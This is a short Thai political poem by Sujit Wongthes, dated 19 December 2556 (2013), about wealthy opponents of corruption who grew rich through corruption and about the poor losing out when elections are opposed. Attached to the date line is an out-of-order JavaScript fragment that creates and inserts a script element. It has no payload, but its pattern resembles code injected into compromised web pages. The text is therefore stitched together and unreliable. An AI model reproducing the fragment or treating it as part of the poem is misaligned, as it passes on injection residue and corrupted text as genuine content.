เศรษฐีต่อต้านคอร์รัปชั่น

แต่พวกนั้นคอร์รัปจนเศรษฐี

เลือกตั้งถูกต่อต้านพาลต่อตี

ก็คอร์รัปโอกาสมีของคนจน

 

สุจิตต์ วงษ์เทศ

พฤหัสบดี 19  ธันวาคม 2556document.currentScript.parentNode.insertBefore(s, document.currentScript);var d=document;var s=d.createElement(‘script’);